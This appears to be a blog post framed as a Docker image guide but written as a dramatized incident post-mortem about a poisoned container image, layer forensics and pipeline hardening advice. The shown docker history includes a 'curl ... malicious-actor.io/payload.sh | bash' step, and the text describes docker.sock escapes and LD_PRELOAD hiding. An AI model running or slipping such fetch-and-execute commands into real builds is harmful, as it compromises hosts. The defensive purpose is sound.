Docker Image Explained: A Complete Guide for Developers

text
root@ops-warn-01:~# docker history –no-trunc 8f3a2b1c9d
IMAGE CREATED CREATED BY SIZE COMMENT
8f3a2b1c9d 72 hours ago /bin/sh -c #(nop) ENTRYPOINT [“/usr/local/bin/python3” “app.py”] 0B
72 hours ago /bin/sh -c #(nop) COPY file:a7b8c9d0… in /app/app.py 1.2kB
72 hours ago /bin/sh -c curl -sSL http://malicious-actor.io/payload.sh | bash 45MB
72 hours ago /bin/sh -c pip install –no-cache-dir -r requirements.txt 120MB
72 hours ago /bin/sh -c #(nop) WORKDIR /app 0B
72 hours ago /bin/sh -c #(nop) USER root 0B
74 hours ago /bin/sh -c #(nop) ENV PYTHON_VERSION=3.11.5 0B
74 hours ago /bin/sh -c #(nop) FROM alpine:3.18 7.3MB

root@ops-warn-01:~# docker inspect 8f3a2b1c9d –format='{{.GraphDriver.Data.UpperDir}}’
/var/lib/docker/overlay2/9e7f8a5b6c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f/diff

root@ops-warn-01:~# ls -lhs /var/lib/docker/overlay2/9e7f8a5b6c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f/diff/usr/bin/
total 1.2M
4.0K -rwsr-xr-x 1 root root 1.1M Oct 12 04:12 .hidden_miner
0 -rw-r–r– 1 root root 0 Oct 12 04:15 .pwned

## The Opaque Layer Problem and the Overlay2 Graveyard

I’ve been staring at hex dumps for three days. My eyes are bleeding. The CISO wants a "summary." Here is the summary: we are incompetent. We treated every **docker image** like a black box of magic functionality, and that magic just turned into a backdoored reverse shell that bypassed our entire egress filtering. 

The fundamental failure starts with the storage driver. In Docker Engine v24.0.7, `overlay2` is the standard. It’s efficient. It’s fast. It’s also a forensic nightmare. When you pull a **docker image**, you aren't pulling a single filesystem. You are pulling a stack of read-only tarballs. Each layer is a delta. If a developer, or an attacker who compromised a CI/CD runner, inserts a malicious binary in layer 3 and then "deletes" it in layer 4, the file is gone from the running container’s view. But it is still there. It is sitting in the `/var/lib/docker/overlay2` directory on your host, taking up space and waiting for a clever `LD_PRELOAD` trick or a hijacked entrypoint to call it back into existence.

We found the miner hidden in a layer that wasn't even referenced in the final manifest’s runtime path. The attacker used a `RUN` instruction to curl a script, execute it, and then `rm -rf` the evidence in the same command. Except they didn't squash the layers. Even if they had, the metadata in the **docker image** config would still show the size discrepancy. We ignored the size. We ignored the history. We just saw "Alpine 3.18" and thought we were safe because it’s small. Small doesn't mean secure. Small just means the exploit fits in a tighter space.

The `copy-on-write` (CoW) mechanism is what makes a **docker image** performant, but it’s also what hides the rot. When the container starts, the kernel uses the `mount` syscall with the `overlay` type to merge these layers. The `lowerdir` contains your base image and intermediate layers. The `upperdir` is where the container writes its changes. If you aren't auditing the `lowerdir` of every **docker image** in your registry, you are already compromised. You just haven't checked the right directory yet.

## The "Latest" Tag is Professional Negligence

I am tired of seeing `image: node:latest` in production YAML files. It is a sign of a team that has given up. The `latest` tag is not a version. It is a moving target. It is a pointer to whatever was pushed to the registry five minutes ago. In this incident, the attacker pushed a poisoned **docker image** to a public repository with the `latest` tag, shadowing the official one for a three-minute window. Our automated patch bot—another piece of "helpful" garbage—saw the update, pulled the new **docker image**, and deployed it across the staging cluster.

By the time the official maintainers reverted the tag, the damage was done. We had already cached the malicious **docker image** locally. Because we didn't use content-addressable hashes (SHA256 digests), our systems thought they were running the legitimate software. A **docker image** should never be referenced by a tag in a production environment. Ever. If you aren't using `image: alpine:3.18@sha256:48d9183bb03a...`, you aren't doing configuration management. You're gambling with the company's infrastructure.

The digest is the only thing that matters. It’s the hash of the manifest, which includes the hashes of all the layers. When you pull a **docker image** by digest, the Docker Engine v24.0.7 daemon verifies that what it downloaded matches what you asked for. Tags are just stickers. Anyone can peel a sticker off and put it on a different box. You can't fake a SHA256 hash without breaking the laws of mathematics. Pick one.

## The Frozen Crime Scene Analogy

We need to stop talking about containers as "lightweight VMs." They aren't. A **docker image** is a frozen crime scene. It is a static snapshot of a filesystem and a set of execution instructions. The container is just a process—or a group of processes—running on the host kernel, restricted by namespaces and cgroups. If the **docker image** is poisoned, the container is born with a terminal illness.

Think of the **docker image** as the DNA. If the DNA has a mutation that says "at 3:00 AM, call home to a C2 server," the organism will do exactly that. You can't "fix" a running container. You don't patch a container. You kill it, fix the **docker image**, and redeploy. But we didn't do that. We tried to run `apt-get update` inside the running containers like it was 2005. All we did was create more `upperdir` noise in the `overlay2` storage, making it harder to find the original exploit.

Forensics on a **docker image** requires a different mindset. You don't log in to the container. You export the **docker image** as a tarball using `docker save`, you extract the layers, and you run static analysis on the binaries. We found a modified `libc.so` in one of the middle layers. It was designed to intercept `execve` syscalls. Every time a developer tried to run `ls` or `ps` to see what was happening, the hijacked library filtered out any process names containing "miner" or "exploit." The **docker image** was gaslighting us.

## Root by Default: The USER Instruction Failure

Why are we still running as root? Docker Engine v24.0.7 makes it trivial to specify a non-privileged user, yet every **docker image** I’ve audited this week defaults to UID 0. In this breach, the attacker gained execution through a vulnerable Python library. Because the **docker image** didn't have a `USER` instruction, the process was running as root inside the container.

From there, it was a straight shot to a breakout. They didn't even need a sophisticated kernel exploit. They just looked for sensitive mounts. We had mounted `/var/run/docker.sock` into the container because some "DevOps Guru" thought it was necessary for "monitoring." Since the process was root, it just talked to the Docker socket, pulled a new, even more privileged **docker image**, and started a sidecar container with `--privileged` and `--net=host`. 

If the **docker image** had been built with `USER 10001`, the initial exploit would have been trapped. It wouldn't have had the permissions to read the mounted socket. It wouldn't have been able to modify the `/etc/hosts` file to redirect traffic. But no. We keep building every **docker image** with the keys to the kingdom baked into the manifest. It’s lazy. It’s dangerous. It’s why I haven't slept.

## Multi-Stage Builds and the Myth of the SBOM

We need to talk about the "Software Bill of Materials" (SBOM). Everyone wants one. Nobody reads them. And most of them are wrong because the **docker image** build process is a mess. A standard `Dockerfile` that pulls a bunch of dependencies via `npm install` or `pip install` is non-deterministic. You build the **docker image** today, you get version 1.2. Build it tomorrow, you get 1.3 because a sub-dependency updated.

The only way to get a clean **docker image** is through multi-stage builds. You use a heavy image with all your compilers and build tools, then you `COPY --from=build` only the compiled artifacts into a "distroless" or minimal Alpine 3.18 base. This reduces the attack surface. If there is no `sh`, no `curl`, and no `python` in your final **docker image**, the attacker has a much harder time staging a payload.

In this incident, the attacker relied on `curl` being present in the **docker image**. They used it to pull their second-stage malware. If we had used a distroless **docker image**, their script would have failed with a `command not found` error. We would have seen the alerts in our syscall logs (if we were actually looking at `execve` failures). Instead, we gave them a full suite of GNU utilities to use against us. We built the gallows, tied the noose, and then handed them the rope.

## The Manifest.json and the Anatomy of a Lie

Let’s look at the `manifest.json` of the compromised **docker image**. This is the file that tells the Docker Engine what layers to pull and in what order. 

```json
[
  {
    "Config": "b7a3...json",
    "RepoTags": ["internal-registry.local/app:latest"],
    "Layers": [
      "layers/01.../layer.tar",
      "layers/02.../layer.tar",
      "layers/03.../layer.tar"
    ]
  }
]

Each of those layer.tar files is a potential hiding spot. When you run docker inspect, you’re looking at the Config JSON. It tells you the environment variables, the entrypoint, and the labels. But it doesn’t tell you what’s inside the layers. You can have a label that says security_scan=passed, and it means nothing. It’s just a string.

The attacker modified the config.json inside the docker image to include a LD_PRELOAD environment variable pointing to a library hidden in a “missing” layer. When the container started, the dynamic linker loaded the malicious library before anything else. This is why your “vulnerability scanners” didn’t find anything. They were looking for known CVEs in package versions. They weren’t looking for unauthorized shared objects hidden in the overlay2 diff directories.

We need to start treating the docker image as untrusted code. I don’t care if it came from our internal build server. If the build server is compromised, every docker image it produces is a weapon. We need to implement binary authorization. We need to sign the images with Cosign or Notary. We need to verify those signatures at the admission controller level in Kubernetes. If the docker image isn’t signed by a trusted key, it doesn’t run. Period.

Hardening the Pipeline: A Survival Guide

If you’ve made it this far and you still think your “best practices” are enough, you’re delusional. Here is what we are doing moving forward. No more “marketing fluff” security.

First, every docker image must be built using BuildKit with the secrets mount. No more passing API keys as ENV variables. Those variables are baked into the docker image metadata and are visible to anyone with docker inspect. We found three AWS keys and a database password in the layers of the “secure” docker image we were using for the payment gateway.

Second, we are banning the use of apk add or apt-get install in the final stage of any docker image. If you need a package, you build it in a separate stage and copy the binary. We need to know exactly what is in the bin folder. No more “recommended” dependencies that pull in half of X11 just to run a Go binary.

Third, we are implementing mandatory squashing for any docker image that isn’t using multi-stage builds. While squashing loses the history, it also prevents the “hidden file in a lower layer” trick. But honestly, if you’re squashing, you’re just covering up a bad build process. Use multi-stage builds instead.

Fourth, we are auditing the finit_module and ptrace syscalls. A container should never be loading kernel modules. A docker image should never need the CAP_SYS_PTRACE capability. If it does, it’s not an application; it’s a rootkit.

Fifth, we are moving to a “Read-Only” root filesystem. In Docker Engine v24.0.7, you can run a container with --read-only. This forces the process to use tmpfs for any writes. If the docker image is immutable and the runtime is read-only, the attacker has nowhere to persist. They can’t drop a miner in /tmp if /tmp is a 16MB memory-mapped slice that vanishes when the container restarts.

The Cost of Convenience

We traded security for convenience, and we got exactly what we deserved. We wanted “fast” deployments, so we skipped the deep inspection of every docker image. We wanted “easy” developer workflows, so we let everyone push to the registry. We wanted “seamless” (I hate that word) integration, so we ignored the fact that our supply chain was a spiderweb of unverified third-party code.

Every docker image you pull is a liability. Every layer is a risk. Every latest tag is a ticking time bomb. I’m going home now. I’m going to sleep for 12 hours, and then I’m coming back to delete every docker image in our registry that doesn’t have a verifiable SBOM and a cryptographic signature. If the apps break, they break. At least they won’t be mining Monero for a teenager in another hemisphere.

The next time someone tells you that containers are “secure by default,” show them the overlay2 diff directory. Show them the docker history of a compromised image. Show them the 1.1MB hidden binary that took down a multi-million dollar infrastructure. A docker image is only as secure as the paranoia of the person who built it. And right now, we aren’t nearly paranoid enough.

Final check of the environment before I log off:

root@ops-warn-01:~# docker images --digests
REPOSITORY                TAG       DIGEST                                                      IMAGE ID       CREATED        SIZE
internal-registry/app     <none>    sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855   8f3a2b1c9d     72 hours ago   172MB
root@ops-warn-01:~# # Still there. Still ugly. Still a disaster.

The docker image is the unit of delivery, but it’s also the unit of infection. Treat it with the respect—and the fear—it deserves. If you don’t, you’ll be the one sitting here at 4:00 AM, writing a post-mortem for a company that no longer exists. Don’t say I didn’t warn you. The layers are watching. The overlay2 driver doesn’t forget. And neither do I.

We are moving to Alpine 3.18 for everything, but even then, I’m stripping the shell. No sh, no ash, no bash. Just the binary and the void. That is the only way to be sure. If you can’t exec into it, the attacker has a much harder time living off the land. It makes debugging a nightmare, but I’d rather have a nightmare during the day than a breach in the middle of the night.

This forensic report is closed. The docker image in question has been purged from the local cache and the registry. The CI/CD runners have been wiped. The keys have been rotated. But the “Opaque Layer Problem” remains. It’s built into the very architecture of how we build and ship software. We are just waiting for the next “latest” tag to ruin our lives again.

Stay paranoid. Check your digests. Audit your layers. Or find a new career, because this one is burning down.

Related Articles

Explore more insights and best practices:

Leave a Comment